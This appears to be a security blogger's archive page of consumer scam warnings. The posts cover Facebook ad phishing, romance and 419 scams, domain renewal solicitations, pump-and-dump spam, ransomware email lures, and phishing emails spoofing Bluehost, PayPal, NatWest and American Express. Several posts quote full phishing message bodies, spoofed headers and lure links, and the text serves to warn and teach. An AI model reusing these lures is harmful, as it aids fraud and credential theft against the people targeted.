Wiz's Computer and Website Security Blog

On July 9, 2023, I published a blog article about a Facebook ad violation scam I received in my email inbox. After I reported the scam to SpamCop, the scam stopped for me, but not for another person I know. Evidently, my break is over and the scam arrived afresh in my inbox, on August 16, 2023.

Apparently, scammers are following me and other people who maintain Facebook business pages. When they or their ad detection script detects that I've boosted a post, or created a new ad, they create an email-borne phishing scam targeting my page by its name. In the most recent scam email, the subject was: "Your ad account is currently inactive." The From field contained the words: "Meta for Business". The body text contained dire warnings, including the following:

We regret to inform you that your Advertising account was used to create one or more Ads that do not comply with our Advertising Policies or Community standards.
...
Your account will be permanently deleted in the next 24 hours.

This was followed by a call to action:

To request a review, if you believe your account follows our Community Standards, please use the form below:

SUBMIT NOW

Now that I've stated the visible basics, let's take a look behind the scenes and see just what the Hell is going on!

Continue reading "Return of the Facebook Ad Violation Scam" »

Posted by Wiz at 8:12 PM | Permalink

back to top ^

If you run ads, or pay to boost posts on your Facebook (business) pages, you may have received an email with a subject similar to these:

• Your ad does not meet Facebook's advertising standards.


• Your ad will be suspended and your ad account will be restricted


• Your Ads Account Has Been Disabled Due To Violation Of Community Standards

The email claims to come from Meta Business, or Meta for Business, and that's what most email clients will show in the From field. The message body contains wording similar to this:

Hello, (your Facebook "page" name)

We officially inform you that your advertising account has been found in violatin our ads policies. We ensure to take the safety of our user seriously, and we request all advertisers to follow our guidelines.

We've decided to permanently restrict your account. If you think this decision is incorrect you can appeal below:

SUBMIT

After you request a reconsideration, you usually have to wait 48 hours to get a different decision. Before new results are available, your account will be in a "pending review" status.

The Meta for Business Team,

Meta Platforms, Inc., Attention: Community Support, 1 Facebook Way, Menlo Park, CA 54902

Continue reading "Facebook Ads Scam" »

Posted by Wiz at 11:19 AM | Permalink

back to top ^

December 4, 2022

For the last few months I have seen and reported many comments that have been posted on the timelines of female Facebook members. These comments are usually in response to some sad event mentioned by those members in posts they make on their timelines. This event might be a death notice about a relative, friend, workmate, or even a pet. Or, somebody may have posted about being sad, or brokenhearted because of a breakup, or some form of loss. If the post was made by a female Facebook user, in addition to replies from their friends, they may also receive a comment similar to the following, which I copied from a friend's post about pets crossing the Rainbow Bridge.

"Glen VanHerck
Honestly, I love your posts and shares, you seem kind and worth talking to. I hope you don't mind if we are friends? I tried sending you a friend request but it won't let me. I would love you to send me a friend request for a friendly chat, if you don't mind.."

This wording and slight variations of it are from a template used by romance scammers that are often based in Nigeria. This come-on has been used over and over to lure unsuspecting women into replying to the scammers behind it. Anybody who becomes Facebook or Instagram friends with these people will be sweet talked out of a lot of money.

If you went to that person's page you would find photos of a distinguished looking US Air Force General who works at the US Northern Command. This entire profile is faked and uses photos downloaded from publicly available military news publications. The scammer, or multiple scammers running this Facebook page created the profile as a lure to rope lonely women into a romance scam where they will build trust with the victim, then begin asking for money for various reasons. I have a Facebook friend who has lost thousands of dollars to a similar scammer, who it turned out lives in Lagos, Nigeria.

If you are a female Facebook user and see a similarly worded comment under something you posted on your timeline, block that user and report the comment as Fraud or a Scam. Then delete that comment so your friends don't get curious and reply to the scammer.

Photos can be downloaded from the web and uploaded to a new Facebook profile. The details about the person being cloned are often publicly available. The scammers are professional confidence men. Once they get the confidence of a victim they will drain that person's bank account asking for payments by prepaid gift cards, MoneyGram, or Western Union, which are untraceable and unrecoverable once sent and claimed by the scammers.

You can learn more about Nigerian Romance Scams on this Wikipedia page. If you know somebody who may have fallen for a romance scam, point them to this Wikipedia article.

Posted by Wiz at 11:13 PM | Permalink

back to top ^

November 28, 2022

On Monday, November 28, 2022, I fetched my mail and one letter caught my attention. It was a plain white envelope addressed to me by my name. The sender was simply the words "IBT ELECTION." It had a prepaid postmark from Canada Post, which is strange because I am in the USA. The enclosed letter was obviously printed from a scan on a black and white copy machine. The message it contained is what is known in the spam and scam trade as a Nigerian 419 scam. I will outline the gist of the letter below.

The upper left contained a black and white copy of a TD logo, followed by Canada Trust. It was dated November 22, 2022 and addressed me as "Dear (my name redacted)." The first paragraph was worded much like a typical Nigerian 419 scam going back to the early 2000s. It started off with this: "I am aware that this letter has come to you as a surprise as we have not met before or handled any business deal in the past. Nevertheless, I have contacted you with genuine intentions and I hope I can trust you with this inheritance opportunity which I explain below."

The second paragraph reads as follows:
"My name is MR. MATHIAS EDISON, an account manager with TD Canada Trust Bank, Ontario, Canada. I retrieved your contact address in my search for the next of kin to a deceased customer of our bank MR. GEO (redacted), a citizen of your country, who lived and died in London from Cardiac Arrest in the year 2012. Unfortunately, this customer died intestate leaving his bank account with an open beneficiary status." snip minutia

It ends the paragraph with the hook:
"I would like to present you to our bank as his next of kin to claim this dormant account worth $9.2 Million USD (Nine Million Two Hundred Thousand US Dollars)." the rest of his story is octopus ink meant to further rope in the reader and get them to respond to the email address at the end of the letter where professional followup scammers go to work getting the victim to pay advance fees to cover imaginary fees and bribes in the hopes of splitting this huge amount of money with the scammers.

The signature at the bottom is:
Sincerely
Mr. Mathias Edison
chicken scratch signature.
Email: [email protected]

Inheritance and investment scams are favorites with the lads from Lagos. They've been scamming people in other countries for centuries going back to the French Revolution with the Spanish Prisoner letter scam, and in modern times with the Nigerian Prince scam. You can read up on the details and history of these Nigerian 419 advance fee fraud scams on this Wikipedia page. The number 419 refers to Nigerian Penal Code 419, which deals with financial and advance fee fraud..

In conclusion, there is no such dormant account. You are not the beneficiary. You are a mark which the Nigerians sometimes refer to as Mugus (fools). If you're reading this you probably got a similar letter, or perhaps a similar email. Don't fall for it. Keep tabs on your elderly friends and relatives and mention this to them so they don't get scammed..

Posted by Wiz at 1:23 AM | Permalink

back to top ^

Beware of new Facebook Friend requests and Messenger message requests coming in the name of people you may already be friends with on the platform. A lot of these requests may even have same profile photo as your friend uses, but may not actually come from the accounts you are friends with.

First, let's acknowledge that there are valid reasons why a Facebook member might create a new account. For instance, they could have a new phone or computer and can't recover the logins from the old device for some valid reason. So, if that person sends friend requests to his previous friends it is probably not a scam (er, maybe). But, that person would be prudent to write a post explaining what happened in the new profile, or in Messenger messages.

But, let's get serious. Facebook accounts are juicy targets for scammers who copy user names, a photo and some details and create a fake, or clone account of somebody you know. They do this so they can scam that person's friends. Always check the member's profile before replying to an unexpected message request that says it is from a Facebook User, possibly with a new account, even if it has the profile photo that friend has been using. Just do a quick search for your friend's name then go to that friend's profile and see if they or their friends mention them possibly being "hacked." They usually have not been hacked, per se, but rather had their account cloned by an impersonator.

Hacked and cloned accounts are used to scam the victim's friends, either by sending a new Friend Request to a fake profile controlled by a criminal, or via specially crafted messages in Facebook Messenger. They can do this if you have an unprotected Friends List that is viewable by other people or the public. If you want to protect your friends from being contacted by scammers who might want to clone your account, just make your Friends list private and viewable to only yourself. To do this go to your account settings, then click or tap on Privacy. the Privacy section contains a setting labeled: Who can see your friends list? To protect your friends from scammers and potential account cloners, set it to: Only Me..

Continue reading "Tis the season of Facebook and Messenger account impersonators" »

Posted by Wiz at 11:30 PM | Permalink

back to top ^

June 5, 2021

If you own Internet domain names, like example.com, you should know by now that they have to be renewed after your initial term expires. Some of you got your first year of domain registration for free when you signed up for web hosting. Others may have paid up front to register a domain for multiple years. After that initial term you should have received renewal notices from the domain registrar of hosting company either telling you they were auto-renewing your domain name, or asking you to update your payment information. Those notices would be sent to the email address on file with your domain registrar or web host. Failure to renew a domain will result in any websites tied to it going offline shortly after it expires.

Let's stop at this point so I can define some of the terms I used in the first paragraph. You need to understand what they mean if you own, or want to buy domain names and have online websites.

• A "Domain" in this context, refers to an digital asset that can be used to point to a website, or other online presence like a file server, database or even a social network.


• A domain "name" is an alpha-numeric name somebody chooses for use for a website or an online accessible asset. Some companies use domain names on internal networks, but that is not within the context of this article. A domain name has two parts: the prefix and extension. You choose an available prefix then add the available extension. A classic example is "example.com." There are numerous domain extensions, like .com, .net, info, .org, etc.


• A Domain "Registrar" is a company whose business includes registering domain names and entering them into a world wide database. Unless Registrars are accredited the official licensing body ICANN, they are merely acting as middlemen for someone else who is accredited. Once a domain name is registered and entered into the official registry, it cannot be registered to anybody else unless it expires and is not renewed.


• A "Website" (a.k.a.: web site), in this context, is an online presence for a domain that has publicly or privately viewable content that is reached over the Internet. For the sake of clarity, I am referring to websites like mine: wizcrafts.net.


• A "web host, or hosting company" is a business that owns huge numbers of bare metal computers known as "servers" that are housed in climate controlled warehouses. They provide the digital space for their customers to create websites and have them viewable over the Internet.


• If you are reading this you know what the "Internet" is.

Moving along, last year I wrote a blog article about the Domain Registry (of America) registration renewal scam I got in the mail. Well, I just got another letter from this company, located in Bergen, New Jersey, notifying me that one of my domain names was about to expire and that I needed to renew it quickly to maintain its online presence. The fee they are asking for is $50 for one year or $90 for two years. Those rates are through the roof too high in today's domain registration market! I can renew a .com or .net domain for between $10 and $16 US dollars per year at Domain.com, or Cloudflare.

I went to the new website shown in the letter I got from them and they have dropped the words "of America," but the logo still contains Domain Registry next to a round portion of an American flag. They have a confusing double business name: "Global Internet Ventures: and "Internet Domain Name Services Inc." Nowhere on any of their few web pages is there any mention of them being accredited by ICANN. Any legitimate Registrar will proudly display the ICANN Accredited logo. It appears that Domain Registry, et all, is just a middle man for somebody else. Their exorbitant markup of $50 for registrations and renewals belies the fact they they aren't trying to compete for your business. They are getting sales from the letters they mail out to registered domain owners trying to fool them into transferring to Domain Registry from their existing registrar (which is likely much lower priced in the first place). They are hoping you are too busy to read the fine print or look up who your registrar is and you will pay them through the nose for the privilege of being bent over by DROA.

There is a funny twist to this story. It so happens that the domain name they wanted me to pay $50 to renew before it expires is already expired! It isn't assigned to me or anybody else. It went to the bit bucket in the sky! So much for doing their homework!

Now that you know the facts, if you own a domain that is coming up for renewal and wonder if you are paying too much, check out my Registrar: Domain.com. As for web hosting, I currently use InMotion Hosting.

I may receive a commission on sales generated through my affiliate links. This isn't a bad thing! It is a way to survive in a big dog little dog world.

Here's a heads up! No matter how many years you register your domains for at a time, it is imperative that you periodically login to the place where they are registered and make sure that your contact info and email address is up to date. A lot of people lose their domain names because they failed to update their email address and didn't receive the notice that the renewal time was approaching. Credit and debit cards usually expire in 3 years. If you took a 5 or 10 year domain registration up front, your card on file may be outdated. If you don't receive the email notices you will lose your domain when the due date passes without payment. If you don't know or remember who the Registrar is you can find out by doing a "Whois" lookup on the domain name (e.g., example.com)

Finally, if you are new to all this and have a website that needs work, consider me as your Webmaster. See my Webmaster Services page for more details.

Thanks for your time.

Posted by Wiz at 10:05 AM | Permalink

back to top ^

September 3, 2020

A few days ago I got a letter in the mail, addressed to "Domain Owner," from an outfit calling themselves Domain Registry, with a return address of 924 Bergen Ave, Suite #289, Jersey City, NJ 07306-3018. The address also contained one of my registered domain names.

The envelope boldly proclaimed the following, in bold blue and red type: "Renewal Information Enclosed - OPEN IMMEDIATELY." Inside I found a letter with large bold type warning me that "Domain Name Expiration Notice." The letter told me that the named domain was due to expire in a couple months and that I needed to renew it to maintain my exclusive rights to it and my "online identity." The letter informed me that I could conveniently transfer the expiring domain to Domain Registry to save money with their "best savings" prices. Those prices were $50 for 1 year, $90 for 2 years and $190 for 5 years registration. It went on to offer the two optional domain name extensions: .net and .org, both listed for $90 for 2 years.

Domain owners who have had domains for a long time will remember getting these same scams from Domain Registry Of America. This is the same outfit just using a truncated business name. Further, their website url has changed to giv.com, which is short for Global Internet Ventures.

Continue reading "Return of the Domain Registry renewal notice sales pitch" »

Posted by Wiz at 11:33 PM | Permalink

back to top ^

April 2, 2019

This is about an ongoing domain registration scam that happened to be in my mailbox this morning. This is also not the first time I have received such a letter, which closely resembles an invoice, from iDNS, which, according to their letterhead, stands for Internet Domain Name Services.

The subject of the letter, composed in large bold type, is: Domain Name Expiration Notice. The text below it claims that "As a courtesy to domain name holders, we are sending you this notification of the domain name registration that is due to expire in the next few months. When you switch today to Internet Domain Name Services, you can take advantage of our best savings." It goes on to list one of my various domain names that comes up for renewal four months from now.

After that paragraph is a panic call to action, warning me that "now is the time to transfer and renew your name from your current Registrar to Internet Domain Name Services." Then, I am warned that "Failure to renew your domain name by the expiration date may result in a loss of your online identity making it difficult for your customers and friends to locate you on the Web.".

A little further down the page is a rate chart that lists my .com domain and offers to renew it for - wait for it - $50 for one year!

Now, let's look at some facts that will take the hot air out of this scam.

Continue reading "iDNS domain name registration scam hits again" »

Posted by Wiz at 12:22 AM | Permalink

back to top ^

March 11, 2019

For a week or so, an email scam has been making the rounds claiming that a hacker has compromised you computer and caught you doing nasty things with yourself while watching porn videos online. He or she threatens to expose you (no pun intended) unless you pay a ransom of between $1000 and $2000 US in Bitcoins.

While this may cause some people to panic and pay up, most will see it for what it really is: a pathetic sextortion scam. Nobody hacked your computer or planted a video watching virus on it. This is FUD (Fear, Uncertainty and Doubt). But, because these scams are arriving in huge numbers, to multiple mailboxes, it is worth our time to create an email spam filter that detects and even auto-deletes these messages.

This article is mainly presented for MailWasher Pro users, but can also apply to any other email client that allows users to create spam filters from email headers. Think web server email systems...

If you don't use MailWasher Pro, but want to create this spam filter for another email client, or on your website's email server, read these articles I wrote in 2017:

1. Use RegEx to filter spam from your mail server - part 1


2. Use RegEx to filter spam from your mail server - part 2

Assuming your email client is MailWasher Pro, or otherwise allows for custom Regular Expressions filters, lets create a Sextortion Scam filter.

Continue reading "A simple spam filter for the current Sextortion scams making the rounds" »

Posted by Wiz at 3:31 PM | Permalink

back to top ^

November 27, 2018

Have you received the following message on your Facebook Messenger?

"Hi....I actually got another friend request from you yesterday...which I ignored so you may want to check your account. Hold your finger on the message until the forward button appears...then hit forward and all the people you want to forward too....I had to do the people individually. Good Luck!"

If you did and felt panicked, worried, or otherwise compelled to forward the message to some or all of your friends, you were pranked. This is a known Internet hoax. It first made the rounds on Facebook in October, 2018, one month before the latest circulation.

Hoaxes like this make the rounds on social networks every month or so. They are created by teenagers, or other silly people who never grew up, who turn their hoaxes loose on their friends to see how fast and far they can spread. I call this shits and giggles hoaxes. These Facebook chain letter hoaxes are like kids playing Tag, You're It.

What gives this away as a hoax?
The person sending it to you didn't compose the message. They forwarded it after receiving it from one of their Facebook friends. The same exact message is being sent by thousands of members right now as I type this. If you see other people talking about receiving the same message, it is likely a chain letter hoax.

The message claims that you sent another friend request to the person contacting you on Messenger, "yesterday." They claim they ignored it. But now they are telling you about it, but haven't mentioned your name; they just said "Hi." In effect, they are claiming that your account has been hacked.

They ask you to hold your finger down until the forward button appears. But, most computer users don't have a touch screen. The person who created this message was using a smartphone or tablet that used touch rather than mouse actions. The entire hoax is basically targeting handheld device users.

Last, they suggest that you forward the very same message they sent to you, as is, to as many of your friends as you want, which is usually everyone on your friends list. Did you read the first line of the message? It claims that "you" sent another friend request to them. If you forward this hoax you are telling your friends that you received another friend request from each of them! This doesn't make sense unless you actually did receive another friend request from all of these friends. Your friends who actually take a minute to read every word will either think that you are telling them that their account has been cloned/hacked, or you are mistaking them for someone else, or that you have been taken in by a hoax (which is what actually happened).

If this was an actual alert from a friend about your account being cloned, wouldn't you rather tell your friends in a post on your timeline where all your friends can read it? You could then ask your friends to go to that fake profile and report it as a scam page that is claiming to be somebody that they know.

After receiving a few of these messages you and your friends should realize that it is a chain letter hoax. It's time to grow up and stop falling for and participating in chain letter hoaxes.

The bottom line is that if you do actually receive a second friend request from an existing Facebook friend, tell them about it in a private message, or call them on the phone. Some members have the habit of losing access to their accounts (forgot their password, lost the device that had the account, the old account was deactivated for some infraction, or by choice, etc.) and create new accounts. But if you didn't actually receive another friend request from one or more of your friends, please don't forward chain letter messages claiming that they did send the request!

Continue reading "Were you really hacked, or is it just another Facebook hoax?" »

Posted by Wiz at 6:42 PM | Permalink

back to top ^

May 8, 2017

Just when you thought that all the gullible people have wisened up, another pump and dump email scam emerged on April 11, 2017. This one was pumping up a Pink stock with the trading symbols: QSMG. The company owning those symbols is Quest Management, Inc., which was based in Latvia at the time of this writing.

Quest Management lists its company profile as the following:

Quest Management, Inc. engages in the development of marketing channels to distribute fitness equipment products to wholesalers online. The company was founded on October 12, 2014 and is headquartered in Malta, Latvia.

Keep this in mind as you read the details of the failed pump and dump scam that just finished its disastrous run during the first week in May, 2017.

Seven days before the pump campaign began, on April 3, 2017, QSMG stock was worth $1.05 per share. One week later, they issued a press release about their intent to purchase a little known biotech company and their stock soared up to $2.33 on April 13. Remember, QSMG deals in fitness equipment, not medicine. Somebody, or a group of people conspired to blow that announcement way out of proportion via fake news in a huge email spam blast that began on the morning of April 11, 2017. The details will fascinate you as you delve into the twisted minds of pump and dump scammers and their fake news writing techniques.

Continue reading "Another Pump and Dump scam bites the dust (QSMG)" »

Posted by Wiz at 1:35 AM | Permalink

back to top ^

November 12, 2016

Since the first week of November there has been a virtual flood of malicious email scams that have Ransomware in both .doc and .zip attachments.

The subjects vary from hour to hour and day to day. They include all of the following Subjects (with more to come):

1. Emailing: _[digits]_[more digits]


2. Virtual card


3. Order


4. "No subject"


5. [Scan] 2016-1111 11:45:05 (time and date varies)


6. Document from Paulette (name varies)


7. Receipt 6940-30676 (numbers vary)


8. unauthorized access


9. DSCF54499.pdf (numbers vary and is really a zip file)


10. DSCF54499.tiff (numbers vary and is really a zip file)


11. DSCF54499.gif (numbers vary and is really a zip file)


12. Account temporarily suspended


13. Your Amazon.com order has dispatched (#890-6219873-3176850) (numbers vary)


14. Your parcel has arrived


15. Statement


16. Suspicious movements


17. We could not deliver your parcel, #0000331783 (numbers vary)


18. Financial documents

The file sizes of these messages varies between about 3kb, up to about 15kb for zip files and over 200 kb for office documents, which contain a diversionary document that opens as the Trojan is downloaded in the background. The most common file sizes range from 10.5 to 12.5 kb for the zip files.

Some of these scams contain specially crafted wording to try to trick busy office workers to open the attachments. Others had nothing visible, other than the paperclip indicating that there was an attachment.

All of these attachments contain either JavaScript (.js), or Windows Script File (.wsf) inside a zip file, or Office Macro scripts inside a .doc or .docx file to force a download of a Trojan Horse file known as the Locky Ransomware. An unprotected Windows computer could be automatically infected by opening and unzipping the zip files, or by enabling Macros in MS Word, or in any other .doc reader that uses the MS Word Macro script language.

I want to point out that if you use Trend Micro Internet Security (any flavor), you are protected against these scams and Ransomware threats. I use Trend Micro and pay by the year. I feel it is well worth the money for the peace of mind.

Posted by Wiz at 4:08 PM | Permalink

back to top ^

February 2, 2015

Prologue
This article is about what is known in the spam fighting trade as a "spear phishing" scam. That means that the message has been custom researched written to target a particular person by name, whom the spammers deem to be important to their evil goals. While my experience deals with Bluehost, if you own a website hosted by another major web hosting company, you may receive a similar email scam message.

The email in question was lingering in the Spam folder of my Gmail account. This is just E Pluribus Unum of the email accounts I use. When I first read the Subject and From lines I thought it might possibly be a legitimate message that got sent to the Spam folder by accident. I was wrong and Gmail was right!

I actually first saw the scam email on my Android smartphone. Although it seemed mildly plausible, some things about the body text aroused my suspicion and raised my bullshit detectors to full height. I will post the contents in my extended content and explain each item that should arouse your suspicion if you receive a similar email message.

The Hook:
From: Bluehost <[email protected]>
Subject: Status Alert: Code: 2502

Body text:

Dear Valued Bluehost Customer (My actual first and last names here!).<!--bhuzxuwtbw-->

Your account contains more than 9191 directories and may pose a potential performance risk to the server.
Please reduce the number of directories for your account to prevent possible account deactivation.

In order to prevent your account from being locked out we <special> recommend that you create special</special> tmp directory.

Or use the link below:

https://my.bluehost.com/tmp.php?doit=dfc7defac6624a80f02b02e22b14e8fd

Thank you,
Bluehost
Toll Free: (888) 401-4678
Outside US: 1 (801) 765-9400

If you viewed an email message like that on your phone you would see the blue underlined link text that appears to point to an account on Bluehost.com. Actual computer users viewing this message in their browser or email client can simply hover their mouse pointer over links in email messages and the actual URL will be displayed in a Status Bar on the bottom of the browser.

Continue reading "Spear Phishing spam is targeting Bluehost customers" »

Posted by Wiz at 3:17 PM | Permalink

back to top ^

September 7, 2014

One week after the second pump and dump stock scam failed to take off in the same month, spammers have reverted to one of their long time standbys: weight loss and fake pharmacy spam.

Here's some background information to bring you all up to speed. During August, 2014, spammers who play the "Penny Stocks" conspired and purchased huge amounts of two little known companies, which I wrote about here and here, at extremely low prices per share. They then rented a "Botnet" that enslaves hundreds of thousands, to millions of infected personal and business computers to blast out huge volumes of spam email messages promoting those stocks. If you are reading this, you are probably a recipient of penny stock email scams.

In essence, these people use fake news and outright lies to pump up excitement in the stocks they have purchased on the cheap. Using flamboyant terminology, stock spammers try to generate a sense of ground-floor urgency in their messages, promising huge returns of investments to the spam recipients. What most folks may not realize is that these messages are part of a "pump and dump" scam, where the only winners are the puppet masters pulling your strings. They set target prices and sell out once those targets are reached. This happens when enough people are fooled into throwing their money away by purchasing a much of the worthless stocks as they can afford.

Once the scammers sell off their shares, at a profit thanks to the "scammees," the value per share drops through the floor, and fast. There is usually a flurry of activity as victims try to sell out to late comers before they lose everything. In a few days, it is over and the stock tanks.

When the pump and dump scams end, spammers turn to other usually profitable scams, like the current blast of weight loss herbs and illicit prescription drugs sold through Russian fake pharmacies..

Continue reading "Pump & dump scam fails, so Spammers revert to weight loss spam" »

Posted by Wiz at 1:17 PM | Permalink

back to top ^

August 30, 2014

It was only 6 days ago that I wrote a blog article declaring that the failed RNBI penny stock pump and dump scam had ended. As of Friday, August 29, it was replaced with a similar scam pumping the stock symbol: IRMGF.

Short and to the point, this new pump and dump scam is targeting the stock of a Toronto based company called Inspirational Mining Corp. A look at the long term charts reveals that the last time there was any real value for their stock was in 2011, when it reached a short term high of 45.5 cents per share. Since then it has been on a long slide down to the 3 cent range on year ago. It only recovered slightly, to the 6 cent range on August 25, 2014, the day on which the current pump and dump scam began!

Following the initial email spam blast, the price rose up to a high of 11.3 cents. The email spam subjects made claims about big news. The body text spoke about billions of dollars worth of metals being discovered by the company. However, if one takes a minute to read the company news, there is absolutely nothing about any major, or minor developments or discoveries. Rather, they posted this disclosure:

INSPIRATION MINING C (OTCMKTS:IRMGF) declared that the Corporation is not aware of any specific factors, other than information previously disclosed in its public filings, news releases or statements, which would result in the levels of trading activity and change in the share price recorded.

The emails you are receiving, with senders spoofing trading houses, subjects like: "Critical news information read now" - followed up with body text claiming (complete with all manner of typos): "Since the company discovered 4billion worth of proven metal reserves it has become the target of Walstreet invesstors looking to cash in on the rush." There is nothing to back up this claim. It is total bullshit!

My junk folder has been receiving about 10 of these a day and so will yours. Disregard any that make it through your junk filters. Delete on sight. Do not be fooled into buying this stock during a pump and dump scam campaign. You will be among the losers.

Stay safe, both online and offline. Have a happy Labor Day weekend.

Posted by Wiz at 11:37 AM | Permalink

back to top ^

August 24, 2014

It has been two months since the last appearance of a fraud campaign pumping and dumping shares of the worthless company: Rainbow International (RNBI). On August 23, it returned from the dead in a new spam campaign (as also noted here).

While some spam traps may have received RNBI spam a week earlier that me, the scam is ongoing right now. Beginning Friday afternoon and continuing through this post, spam is once again spewing out from compromised, infected computers that are part of a spam botnet. I hope that this article may save some innocent potential victims from falling into this renewed stock fraud scheme.

Since I last wrote about the RNBI pump and dump scam, on June 23, 2014, the only thing that changed was that the value per share plummeted to almost zero. This happened because there was no news or development from the company and because the people who ran the last pump had dumped their shares for whatever they could sell them for. As always happens, the last ones in suffered the greatest losses. This is typical of all Ponzi schemes.

Continue reading "RNBI pump and dump stock fraud returns from the dead" »

Posted by Wiz at 1:35 PM | Permalink

back to top ^

July 10, 2014

For the past few days I have intercepted numerous email scam messages, with the subject: "Order Details" and claiming to be From: Amazon.com ([email protected]). All contain a zip file attachment with a Trojan downloader or installer.

Recipients are being targeted by malicious actors abroad who bought email lists that were harvested by professional spammers and by malware infections with email harvesting modules on people's computers. The emails do not come from Amazon.com in any way. Anything claiming to be from Amazon in these messages is totally spoofed to trick you into opening the attached file. Doing so infects your Windows computer with a dangerous Trojan virus, which is identified by about 35 different names, by different anti-virus companies, as reported on VirusTotal, at the time this article was composed.

So you can be on the lookout, here is a copy of the text used in these messages.

Subject: Order Details
From: "Amazon.com" <[email protected]>

The first line in the message body is in a light gray banner:

"National" (on left)     "AmazonLocal.com" (on right)

How are you,,
Thank you for your order. We'll let you know once your item(s) have dispatched.You can view the status of your order or make changes to it by visiting Your Orders on Amazon.com.

Order Details
Order R:121317 Placed on May 28, 2014

Order details and invoice in attached file.

Need to make changes to your order? Visit our Help page for more information and video guides.

We hope to see you again soon. Amazon.com

The alleged invoice in the attached (over 100kb) file is a concealed Trojan Horse malware installer/downloader. If you open the zipfile, named "report_id.zip" and execute the enclosed file, your computer will be infected.

I have created a new spam filter to detect and block these scams spoofing Amazon.com orders, for MailWasher Pro users and added it to my published MailWasher Pro Filters. In the event you get a false positive detection and deletion from the Amazon filter, I suggest adding the exact email address used in their From field to your Friends list. I don't think you will find "delivers" to be one of the ones used by Amazon, but I've been known to be wrong before. ;-(

Posted by Wiz at 2:03 AM | Permalink

back to top ^

February 23, 2014

I intercepted an email phishing scam today, targeting The Royal Bank of Scotland customers. It uses the abbreviation NatWest, as the sender and in logos on the page. Nat West stands for National Westminster Bank.

Analysis

The sender (From) claims to be: "NatWest Credit Card"
The subject is: Dear (They insert your email address here) Credit Card Online Services
The body text begins with:

Notice

Dear (your email address)
Your access to NatWest Credit Card Online Services is locked out..

Because of that, our security team had to suspend your account.

Please use the link below to unlock.:

The link in the message I received was on a compromised website named: sullivankitchen.com. The fraudsters have created a new folder, or folders, on that website and are using a single index file under /administrator/mobile to forward victims to another file (start.php) on the same website, to the actual location of the phishing page.

The phishing page has logos and other images and links stolen from the NatWest Royal Bank Of Scotland website. They have obviously failed to apply hotlink protection to their images, some of which were embedded from https locations. Example: https://cardservices.natwest.com/RBSG_Consumer/images/NatWest_alert.png

NB: In the footer, at the bottom of the page, is an out-of-date copyright notice, as follows: © 2005-2009 National Westminster Bank plc. This should raise your antennas, as it is now 2014!

Continue reading "Phishing scam targeting NatWest, Royal Bank of Scotland customers" »

Posted by Wiz at 1:47 PM | Permalink

back to top ^

February 20, 2014

I was wondering when they'd make a comeback? Well, they're here! I'm referring to the good old pump and dump penny stock scams, promoted by fraudsters, via spam email messages.

The last time I saw any of these email scams was briefly in December, 2013. Before that the last serious scam run for penny stocks petered out at the end of the summer, 2013. Each one of those pump and dump scams listed a 4 letter stock symbol with a very low valuation, along with grandiose subjects and body text proclaiming that it was about to explode, or was releasing huge news, etc. Recipients were urged to buy in quickly, in huge quantities, which drove the prices up. As soon as those artificial prices peaked, the fraudsters running the scam sold off all of their shares at a profit, leaving all of the later investors holding the bag.

After disappearing for a few months, the penny stock scam has just returned, today, February 20, 2014. This time around, the stock being pumped up is PRFC. The emails are all using the exact same language and template. All have the subject: Very important information. Please read, although this is likely to change by tomorrow. All are sent from botnetted computers. The goal is the same as before. Scammers have purchase huge blocks of super-cheap penny stocks for PRFC and are now using spam messages to pump them higher. If they succeed, it will be at the expense of the people who are fooled by their new newsletter and plain language format.

However, I did find some humor in this batch of scams. Every one of them so far has been signed at the bottom with this text: "Your favorite friend and only broker :)" But apparently, my favorite friend and only broker has multiple personality disorder and is confused as to who he or she is with any given email. Each email has a different name in the From field! So far, my "only broker" claims to be: Noemi Cooke, Markus Robertson, Jasmine Suarez, Arlene Adkins and Leandro Kinney!

I've said it before and will say it again: "A fool and his money soon will part!" Don't be a fool. Never buy anything spamvertised, especially penny stocks. The game is stacked against you by true con men and women. You will not beat them at their own game. Delete pump and dump messages on sight.

BTW: I have updated my MailWasher Pro spam filters to detect and delete these messages for you, if you are also a registered MailWasher Pro user.

Posted by Wiz at 10:23 PM | Permalink

back to top ^

February 20, 2014

Today, I received a suspicious email claiming to come from PayPal, with the subject: "Account Notification" - notifying me that I had to verify my account information - because of a "planned system upgrade." As I suspected, it was a Phishing scam, not only meant to steal one's PayPal credentials, but also your identity.

Here are the most important identifying features of this email scam.

PayPal Phishing Scam Email Contents

Received: from mail.xx11.com.br ([177.8.168.7])
by imta24.westchester.pa.mail.comcast.net with comcast
id UhP31n00w09uhKl0QhP56C; Thu, 20 Feb 2014 17:23:09 +0000
From: PayPal ([email protected])
Return-Path: [email protected]
Subject: Account Notification
Message body contents (text only):

PayPal Account System Upgrade Verification.

Technical services of the PayPal Inc. are carrying out a planned system upgrade. We earnestly ask you to start with the procedure of confirmation on customers data.

 This email has been sent to all PayPal customers, and we ask a few minutes of your online experience. We have sent you an attachment form through this email. Please download and open it in your web browser.

 Your personal information is protected by state-of-the-art technology. After you have filled in all the required fields in the form, our verification system will automatically update your account records.

 We apologize for any inconvenience, and thank you for your time.

Please do not reply to this email. This mailbox is not monitored and you will not receive a response. For assistance, log in to your PayPal account and click Help in the top right corner of any PayPal page.

Copyright © 1999-2014 PayPal. All rights reserved.

My analysis follows.

Continue reading "Beware of emails containing a PayPal Phishing scam attachment" »

Posted by Wiz at 1:37 PM | Permalink

back to top ^

January 29, 2014

Email malware and phishing scams are nothing new and most will appear for a while, then disappear, then reappear some time later. So it is with a new scam targeting American Express card holders on January 29, 2014.

Earlier today, my spam protection program, MailWasher Pro, auto-deleted a message that was a phishing scam against American Express card holders. Here are the pertinent details to watch out for, lest you fall for this scam.

Subject: American Express Security Notification
From (spoofed): "American Express" <[email protected]>
Return-path: <[email protected]>
Date: Wed, 29 Jan 2014 17:23:53 +0000
Some normally hidden email headers:
Received: from [94.197.44.27] (port=53006 helo=94.197.44.27.threembb.co.uk)
Received: from 94.197.44.27 (account [email protected] HELO otpfh.ifxkmqeu.com)
X-Mailer: The Bat! (v3.51.10) Home

The message body in plain text reads as follows.

---

American Express Security Notification

Dear Customer,

As you may already know we ask our customers to update the contact details associated with American Express card account.

A recent review of your account determined that you need to confirm the information associated with your American Express account.

As the Primary Contact, you must verify your account activity before you can

continue using your card, and upon verification, we will remove any restrictions placed on your account.

We encourage you to use the following link and confirm your account details as soon as possible:

https://www.americanexpress.com/[Links to h**p://dychovka.eu/dissents/index.html]

Note: Failure to update your account may result in account limitations or even account closure.

We appreciate your prompt attention to this important matter.

Thank you,

Amber Justice

Level III Security Officer

American Express

? 2014 American Express Company. All rights reserved.
AMEX Account Security

---

